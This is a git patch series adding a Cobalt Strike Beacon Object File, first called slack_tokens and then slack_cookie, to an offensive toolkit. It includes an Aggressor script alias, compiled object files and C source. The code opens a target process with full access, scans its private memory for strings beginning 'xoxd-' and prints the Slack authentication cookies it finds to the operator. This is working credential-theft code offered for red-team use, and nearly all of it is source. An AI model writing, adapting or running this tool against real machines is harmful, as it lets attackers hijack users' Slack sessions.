From 9cb0415678aa01b5942d3e748f13d712307779cc Mon Sep 17 00:00:00 2001 From: Tw1sm Date: Wed, 25 Oct 2023 20:03:33 -0400 Subject: [PATCH 1/3] add slack_tokens bof --- Remote/Remote.cna | 23 +++ Remote/slack_tokens/slack_tokens.x64.o | Bin 0 -> 5204 bytes Remote/slack_tokens/slack_tokens.x86.o | Bin 0 -> 5339 bytes src/Remote/slack_tokens/Makefile | 25 +++ src/Remote/slack_tokens/entry.c | 208 +++++++++++++++++++++++++ 5 files changed, 256 insertions(+) create mode 100644 Remote/slack_tokens/slack_tokens.x64.o create mode 100644 Remote/slack_tokens/slack_tokens.x86.o create mode 100644 src/Remote/slack_tokens/Makefile create mode 100644 src/Remote/slack_tokens/entry.c diff --git a/Remote/Remote.cna b/Remote/Remote.cna index 53cb2d2..b3870e2 100644 --- a/Remote/Remote.cna +++ b/Remote/Remote.cna @@ -1820,4 +1820,27 @@ Usage: get_priv Privledge names are listed here https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants They are the equivilent of what you see in whoami /all or our whoami bof from the SA repo " +); + +alias slack_tokens +{ + local('$pid $args'); + if(size(@_) != 2) + { + berror($1, "usage: slack_tokens "); + return; + } + $pid = parseNumber($2, 10); + berror($1, $pid); + + $args = bof_pack($1, "i", $pid); + beacon_inline_execute($1, readbof($1, "slack_tokens"), "go", $args); +} + +beacon_command_register( + "slack_tokens", + "Searches memory for Slack tokens", + "Command: slack_tokens + +Usage: slack_tokens " ); \ No newline at end of file diff --git a/Remote/slack_tokens/slack_tokens.x64.o b/Remote/slack_tokens/slack_tokens.x64.o new file mode 100644 index 0000000000000000000000000000000000000000..274474b50f398f5914e6d951a16ce525dcc9e11a GIT binary patch literal 5204 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 Q_=_j(Vl|^08_PNDzmHdBumAu6 literal 0 HcmV?d00001 diff --git a/Remote/slack_tokens/slack_tokens.x86.o b/Remote/slack_tokens/slack_tokens.x86.o new file mode 100644 index 0000000000000000000000000000000000000000..53accc7e0620d2d3bc11c1e1b7fdb6c4b03710bb GIT binary patch literal 5339 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 PEg|bKA|>(Gn9lwOk!O!3 literal 0 HcmV?d00001 diff --git a/src/Remote/slack_tokens/Makefile b/src/Remote/slack_tokens/Makefile new file mode 100644 index 0000000..88c8eb4 --- /dev/null +++ b/src/Remote/slack_tokens/Makefile @@ -0,0 +1,25 @@ +BOFNAME := slack_tokens +COMINCLUDE := -I ../../common +LIBINCLUDE := +CC_x64 := x86_64-w64-mingw32-gcc +CC_x86 := i686-w64-mingw32-gcc +CC=x86_64-w64-mingw32-clang + +all: + $(CC_x64) -o $(BOFNAME).x64.o $(COMINCLUDE) -Os -c entry.c -DBOF + $(CC_x86) -o $(BOFNAME).x86.o $(COMINCLUDE) -Os -c entry.c -DBOF + mkdir -p ../../../Remote/$(BOFNAME) + mv $(BOFNAME)*.o ../../../Remote/$(BOFNAME) + +test: + $(CC_x64) entry.c -g $(COMINCLUDE) $(LIBINCLUDE) -o $(BOFNAME).x64.exe + $(CC_x86) entry.c -g $(COMINCLUDE) $(LIBINCLUDE) -o $(BOFNAME).x86.exe + +scanbuild: + $(CC) entry.c -o $(BOFNAME).scanbuild.exe $(COMINCLUDE) $(LIBINCLUDE) + +check: + cppcheck --enable=all $(COMINCLUDE) --platform=win64 entry.c + +clean: + rm $(BOFNAME).*.exe diff --git a/src/Remote/slack_tokens/entry.c b/src/Remote/slack_tokens/entry.c new file mode 100644 index 0000000..5562c8b --- /dev/null +++ b/src/Remote/slack_tokens/entry.c @@ -0,0 +1,208 @@ +#include +#include "bofdefs.h" +#include "base.c" + +// Forward declarations: +BOOL GetProcessList( int pid ); +void Write_Memory_Range( HANDLE hProcess, LPCVOID address, size_t address_sz); +void GetProcessMemory( HANDLE hProcess ); + +typedef BOOL (*myReadProcessMemory)( + HANDLE hProcess, + LPCVOID lpBaseAddress, + LPVOID lpBuffer, + size_t nSize, + size_t *lpNumberOfBytesRead +); + +typedef size_t(*myVirtualQueryEx)( + HANDLE hProcess, + LPCVOID lpAddress, + PMEMORY_BASIC_INFORMATION lpBuffer, + size_t dwLength +); + +typedef struct _MEMORY_INFO +{ + LPVOID offset; + unsigned long long size; + DWORD state; + DWORD protect; + DWORD type; +} MEMORY_INFO, *PMEMORY_INFO; + +BOOL GetProcessList( int pid ) +{ + HANDLE hProcess; + hProcess = KERNEL32$OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid); + if( hProcess == NULL ) + { + BeaconPrintf(CALLBACK_ERROR, "OpenProcess Failed"); + return(FALSE); + } + + GetProcessMemory(hProcess); + KERNEL32$CloseHandle( hProcess ); + + return( TRUE ); +} + +void Write_Memory_Range( HANDLE hProcess, LPCVOID address, size_t address_sz) +{ + myReadProcessMemory ptr_ReadProcessMemory = NULL; + BOOL rc = FALSE; + size_t bytesRead = 0; + unsigned char *buffer = NULL; + int index = 0; + int ret_sz = 1; + + HMODULE KERNEL32 = LoadLibraryA("kernel32"); + if( KERNEL32 == NULL) + { + BeaconPrintf(CALLBACK_ERROR, "Unable to load ws2 lib"); + return; + } + ptr_ReadProcessMemory = (myReadProcessMemory)GetProcAddress(KERNEL32, "ReadProcessMemory"); + if(!ptr_ReadProcessMemory ) + { + BeaconPrintf(CALLBACK_ERROR, "Could not load functions"); + goto END; + } + + buffer = intAlloc(address_sz+0x100); + if (buffer == NULL) + { + BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory"); + goto END; + } + + rc = ptr_ReadProcessMemory( hProcess, address, (char*)buffer, address_sz, &bytesRead ); + if (rc == 0) + { + BeaconPrintf(CALLBACK_ERROR, "\nReadProcessMemory failed\n"); + BeaconPrintf(CALLBACK_ERROR, "Bytes Read %d\n", bytesRead); + BeaconPrintf(CALLBACK_ERROR, "\n\n\n %s\n\n\n", buffer ); + return; + } + + //for (index = 0; index < (address_sz/2)-8; index++) + for (index = 0; index < address_sz-5; index++) + { + // search for xoxd- [78 6f 78 64 2d] + if (buffer[index] == 0x78 && buffer[index + 1] == 0x6f && buffer[index + 2] == 0x78 && buffer[index + 3] == 0x64 && buffer[index + 4] == 0x2d) + { + BeaconPrintf(CALLBACK_OUTPUT, "Slack Token: %s", buffer + index); + index += MSVCRT$strlen((char *)(buffer + index)) - 1; + } + } +END: + intFree(buffer); +} + +void GetProcessMemory( HANDLE hProcess ) +{ + LPVOID lpAddress = 0; + MEMORY_BASIC_INFORMATION lpBuffer = {0}; + size_t VQ_sz = 0; + myVirtualQueryEx ptr_VirtualQueryEx = NULL; + + if( hProcess == 0 ) + { + BeaconPrintf(CALLBACK_ERROR, "No Process Handle\n"); + goto END; + } + + HMODULE KERNEL32 = LoadLibraryA("kernel32"); + if( KERNEL32 == NULL) + { + BeaconPrintf(CALLBACK_ERROR, "Unable to load ws2 lib"); + goto END; + } + + ptr_VirtualQueryEx = (myVirtualQueryEx)GetProcAddress(KERNEL32, "VirtualQueryEx"); + if(!ptr_VirtualQueryEx) + { + BeaconPrintf(CALLBACK_ERROR, "Could not load functions"); + goto END; + } + + do + { + PMEMORY_INFO mem_info = intAlloc(sizeof(MEMORY_INFO)); + if (mem_info == NULL) + { + BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory"); + goto END; + } + MSVCRT$memset(mem_info, 0, sizeof(MEMORY_INFO)); + VQ_sz = ptr_VirtualQueryEx(hProcess, lpAddress, &lpBuffer, 0x30); + if( VQ_sz == 0x30 ) + { + if(lpBuffer.State == MEM_COMMIT || lpBuffer.State == MEM_RESERVE) + { + mem_info->offset = lpAddress; + mem_info->size = lpBuffer.RegionSize; + mem_info->state = lpBuffer.State; + mem_info->type = lpBuffer.Type; + mem_info->protect = lpBuffer.Protect; + }else if( lpBuffer.State == MEM_FREE) + { + mem_info->offset = lpAddress; + mem_info->size = lpBuffer.RegionSize; + mem_info->state = lpBuffer.State; + mem_info->type = lpBuffer.Type; + mem_info->protect = lpBuffer.Protect; + } + }else if (VQ_sz == 0) + { + BeaconPrintf(CALLBACK_OUTPUT, "End of memory\n"); + goto END; + } + lpAddress = lpAddress + mem_info->size; + if( mem_info->protect == PAGE_READWRITE && mem_info->type == MEM_PRIVATE) + Write_Memory_Range( hProcess, mem_info->offset, mem_info->size); + intFree( mem_info ); + } while(1); +END: + return; +} + +#ifdef BOF +VOID go( + IN PCHAR Buffer, + IN ULONG Length +) +{ + int pid = 0; + if(!bofstart()) + { + return; + } + + datap parser = {0}; + BeaconDataParse(&parser, Buffer, Length); + pid = BeaconDataInt(&parser); + + BeaconPrintf(CALLBACK_OUTPUT, "Searching only for the following PID %d\n", pid); + GetProcessList( pid ); + + printoutput(TRUE); + bofstop(); +}; + +#else + +int main( int argc, char* argv[]) +{ +//code for standalone exe for scanbuild / leak checks + int pid = 0; + if (argc > 1) + { + pid = atoi(argv[1]); + BeaconPrintf(CALLBACK_OUTPUT, "Searching only for the following PID %d\n", pid); + } + GetProcessList( pid ); + return 0; +} + +#endif From e2d8b058f4b6b37bbdcec7db73a4b0dd10847071 Mon Sep 17 00:00:00 2001 From: Tw1sm Date: Wed, 25 Oct 2023 20:16:12 -0400 Subject: [PATCH 2/3] rename to slack_cookie --- README.md | 1 + Remote/Remote.cna | 12 ++++++------ .../slack_cookie.x64.o} | Bin 5204 -> 5204 bytes .../slack_cookie.x86.o} | Bin 5339 -> 5339 bytes .../{slack_tokens => slack_cookie}/Makefile | 2 +- .../{slack_tokens => slack_cookie}/entry.c | 2 +- 6 files changed, 9 insertions(+), 8 deletions(-) rename Remote/{slack_tokens/slack_tokens.x64.o => slack_cookie/slack_cookie.x64.o} (85%) rename Remote/{slack_tokens/slack_tokens.x86.o => slack_cookie/slack_cookie.x86.o} (84%) rename src/Remote/{slack_tokens => slack_cookie}/Makefile (96%) rename src/Remote/{slack_tokens => slack_cookie}/entry.c (98%) diff --git a/README.md b/README.md index e8c8866..5b847e3 100644 --- a/README.md +++ b/README.md @@ -41,6 +41,7 @@ You are welcome to use these, but issues opened related to these will be closed |schtasksstop| Stop a running scheduled task| |setuserpass| Set a user's password| |shspawnas| A misguided attempt at injecting code into a newly spawned process| +|slack_cookie| Collect the Slack authentication cookie from a Slack process| |unexpireuser| Set a user account to never expire| ## Contributing diff --git a/Remote/Remote.cna b/Remote/Remote.cna index b3870e2..1bba1e6 100644 --- a/Remote/Remote.cna +++ b/Remote/Remote.cna @@ -1822,25 +1822,25 @@ They are the equivilent of what you see in whoami /all or our whoami bof from th " ); -alias slack_tokens +alias slack_cookie { local('$pid $args'); if(size(@_) != 2) { - berror($1, "usage: slack_tokens "); + berror($1, "usage: slack_cookie "); return; } $pid = parseNumber($2, 10); berror($1, $pid); $args = bof_pack($1, "i", $pid); - beacon_inline_execute($1, readbof($1, "slack_tokens"), "go", $args); + beacon_inline_execute($1, readbof($1, "slack_cookie"), "go", $args); } beacon_command_register( - "slack_tokens", + "slack_cookie", "Searches memory for Slack tokens", - "Command: slack_tokens + "Command: slack_cookie -Usage: slack_tokens " +Usage: slack_cookie " ); \ No newline at end of file diff --git a/Remote/slack_tokens/slack_tokens.x64.o b/Remote/slack_cookie/slack_cookie.x64.o similarity index 85% rename from Remote/slack_tokens/slack_tokens.x64.o rename to Remote/slack_cookie/slack_cookie.x64.o index 274474b50f398f5914e6d951a16ce525dcc9e11a..fd23dfa9e409fa2554499a02d2b5faecb39626ac 100644 GIT binary patch delta 65 zcmV-H0KWg!DAXvh76t*TlNSa<0lkx32K@odlUWB@0o#+a2Y3PQvn&Yn0R}^FZ)<5~ XlOzgzv!Dvh1pyb6@eUQUf)LUJCI}cg delta 64 zcmV-G0Kfm#DAXvh76t*SlNSa<0lbr22K@oclUWB@0os$Z2Y3PPvn&Yn0R>cVYh`Ye WB?^19p9;+d0Tz?-4i&S45Yht;aTnSE diff --git a/Remote/slack_tokens/slack_tokens.x86.o b/Remote/slack_cookie/slack_cookie.x86.o similarity index 84% rename from Remote/slack_tokens/slack_tokens.x86.o rename to Remote/slack_cookie/slack_cookie.x86.o index 53accc7e0620d2d3bc11c1e1b7fdb6c4b03710bb..96ae0d0bfd335ce90a6c3914e70daf328aa33e4f 100644 GIT binary patch delta 61 zcmV-D0K)& Date: Thu, 1 Feb 2024 11:45:39 -0500 Subject: [PATCH 3/3] use strnlen and FreeLibrary --- Remote/slack_cookie/slack_cookie.x64.o | Bin 5204 -> 5333 bytes Remote/slack_cookie/slack_cookie.x86.o | Bin 5339 -> 5443 bytes src/Remote/slack_cookie/entry.c | 7 ++++++- 3 files changed, 6 insertions(+), 1 deletion(-) diff --git a/Remote/slack_cookie/slack_cookie.x64.o b/Remote/slack_cookie/slack_cookie.x64.o index fd23dfa9e409fa2554499a02d2b5faecb39626ac..2c3e17798aaf4775d4347e6eeeb904b945a36ab8 100644 GIT binary patch delta 1522 zcmZXUZA@EL7{||TZ)q7ctz)DZb(C2G-Nr^?i*uQQn-F_DE{bu3`LaP3ge8kC*cxUq zgQr3E&65iTm4{{EyKXX_biJ{=1Y8uA**E(WEybl@qg|aHyCbm@AJF= z=Q-zjIlcX=dOGOtdeuqzRpucily>`Sj^cf*M2M@%)X82LKWXjU))kFKg=9Ycc)po_ ztl4n_a3OuV%F$X#$Xxo1`=yW53susM%-vGdZf{rGjAL>@nletw6&rVBV^uHZYgs8C zL`&`DMoo^Z^dsYY*|%;HuL`@S>7&L!a?SP&+^aVQc17rNgwAO6SCuve{2Ki!bdz06 zj>p_us)lc&={>jeVdDwM?%rNa-&3y)H4Max*=6UsnFgg#N&v`YWd=&~C8T~w(baj^XRs0tN?uB!AyAsctuOA=^M z*{|%|-`@7PIx=@4G>(1F@}lXNsy-O-XN&Q&cur0Jsp+wR-}8#ooPitaof$;vB>Ip0 zun-d@S?&@Eat&f$7oi|)=vyJHbP5Y%B`P{kz;$N=x#K)cFRg>goxvk?Rr$crwUvTf z=)6k5QR#w`t%c6MR!5d-W3hO36drbY7eE>Qud8ZqnkB)b`7sIwW4Rn6i^MSJ;2 z9wI~{@wZi^GAo!0d$|&!VOQ=&z8K>g#txqovI7T}zoZN&$_TL$Pm;SMDIa>g@!8*u z<(}i=Ba;W7I@EDcd0IKB98x+ajI?u?wBGpC8I)|sEob|^GfRw(A*`{3$4rc^zKkbb zFBoZ8na^8Dyl0AQi#pdGEo^m-7hI8lw9OM@+;VjWXJtZK(GRyL3kc~2bDP6G1m-r1 zFY9>b<-$H&qR&o<53)=KKvgD*5|?A3!n+wHwypF3S{--o&?puFJlAbrdE7@4| TaDR8VcKDh8X#X)|u_XE*Sp#Nv delta 1461 zcmZXUZD>9QP9b{1G4|TJ$%yMe)5=A*8%P=!C+ANusYk*`Ml{l32r7j~3tW z_M8HY6sIB{%}2;Y@k+BYT3m@Jlcmi{zuW#=ZSK6p8u=D#{Yi7>bQ3K!B9hGbu}DvK z7ZO4aI||LWfeGTNRk3fYO}-`Wn>P#Nw#(DD^LOqnbm<-Ytd)J%qG>&#R+k<&t=nuN z#&YG9-&{K(`_NOPcCTko<|DJ9yN%Jk`cSH#Rp`eR`u6e{wc4K15w|j!UV?EArSHMG zlj)lkGV*np>LixfHREh13~)-_Z!J^nA8J*NnJ9F& zK(kMy!Q2nve3#x?m>|oHjoo377)yUj^9S_~YVES(4b(cIA%I%(O)y%P=vCIEYJh47;qjz>}coQKm63nIe(fN&N@cz=jj8&7&#h5+k?ND~x z&%7P~nPYT0!a6$CUA_nZ5SKyXs6^0PAX&_N4jpl5 z%AwytJH*i!LAsy^jyK?0KP3c`Ep2hMc87L@GP09*fwB`5B&+_w3H%)Nnn-d3B-1@} zysa3hEcy+Q?ENcHtJpE_c#DqrClLQHQOTpNz;=O8K|2L8kUY>|y6az2w(+Y}NEj~> ze+Ka37b=y3K_QZ9do{Sl!!MTFn;Qm{Q>C$nDWzu)|6=Qp+`jmN^7sWMAVbAQiTZO& SM=AgE1;y?TZMBC(AN~hv$WTuJ diff --git a/Remote/slack_cookie/slack_cookie.x86.o b/Remote/slack_cookie/slack_cookie.x86.o index 96ae0d0bfd335ce90a6c3914e70daf328aa33e4f..b62873569a050dbb365b5a43b98eb4e18be779f7 100644 GIT binary patch delta 1182 zcmZXUZAep59LCR?_s;9f^;*qduyEA0RyM5+jS8AImo*}mm13r=R#sFrjLfKMbLEmj zaz0d0Uqbqjg~&ejp@`H*6j4+V6hYCKHApLqUWD6o&K-kraL@VO=l}d)?%D3%+J_gb z9%?51Q?C(H)~C*LhTGjV> zK~_H!>$3@&82T}hL0j2pse%@;B6&T1!S>1})XOf)8)hZWAvY?m=&WjQ%dUyK|E?N8 zIiB>gkMf$Cf9&5Pbv7v?+4KV5C)#G#ll`pJTvhA|ol(g5ffH(cgH5`HSfUK=;*yQ~ z40mLhJ(CK9om_|M9s9CpND>xYvGp=dR_0LJ!D+hyFTb+daka8uW)tyn@A;_n>kN;6bf1- zt@{>pX4W39&~=@6-wX?;SFxq0pPPE=URrfOBLxsY*Q3dtEa=&w50jNZf9kfW$N>GuY zO`!RL+CfG}cbYDOibeElTDu7{>c!I9eb7STdueDvH2w;-3$X?7gwgH<$Y^&qtz8CL zh3_`V7~w9cL}(8|iv|5nM|WfrvP5WpkdYAp85t2!F+WH%c>-K2=oQEz=pD#N8Dj%^ z4LL11H2#~hkZz`Fqs0vvn_?gnG(x&?RU*SsnhzWk>J|1|E0pu_YJ1q6{6X3udz`m1;!2ODKI;2fnZBG( zHPX*wb(Y{#H?ro@9;2F?qUFYlj_Po~1m7R@+LB(EFp1vs7Ca*7}Babu%v!dRl73G#AELxPFiK!DkZ`phhQHZrJbgRP`RqAto;#;;E*=lQk69T z1bT0e)L}`|$1V;cJ}K$TX8Q6OEMb$KTPuB|m9o^@ZJb&Obab{S210oN2CyqFnB)_i za20TFocGK4FI8O@*!lE;)Ie6LBFQ8|$EBdPbyZcvujK&th&#-O4Z$(ILhxisilNpf z)(>S|7s6u39g^_OdXk=*OhG`K-9riH{35_}J>OsxYgyih1^vYGufoG#7a5-}%-ZNP zt5Y0Ax)5KqrbtM{CL7Q+LN1b%r2oJ8s_gp)q6-hg!OV|34WL|s=NjrE>r+FkdcMI|BDCSg-q~*Lwnj1jc z$=!QMC7i~Qa&~cih^UpkqN%JlYd5LD2=C4y~)+vE?%BBC5q4@n=!9b@RGF@_<_ye9~ B;0FKz diff --git a/src/Remote/slack_cookie/entry.c b/src/Remote/slack_cookie/entry.c index 5d5917b..b9392ec 100644 --- a/src/Remote/slack_cookie/entry.c +++ b/src/Remote/slack_cookie/entry.c @@ -88,11 +88,12 @@ void Write_Memory_Range( HANDLE hProcess, LPCVOID address, size_t address_sz) //for (index = 0; index < (address_sz/2)-8; index++) for (index = 0; index < address_sz-5; index++) { + size_t remainingSize = address_sz - index; // search for xoxd- [78 6f 78 64 2d] if (buffer[index] == 0x78 && buffer[index + 1] == 0x6f && buffer[index + 2] == 0x78 && buffer[index + 3] == 0x64 && buffer[index + 4] == 0x2d) { BeaconPrintf(CALLBACK_OUTPUT, "Slack Cookie: %s", buffer + index); - index += MSVCRT$strlen((char *)(buffer + index)) - 1; + index += MSVCRT$strnlen((char *)(buffer + index), remainingSize) - 1; } } END: @@ -164,6 +165,10 @@ void GetProcessMemory( HANDLE hProcess ) intFree( mem_info ); } while(1); END: + if (KERNEL32) + { + FreeLibrary(KERNEL32); + } return; }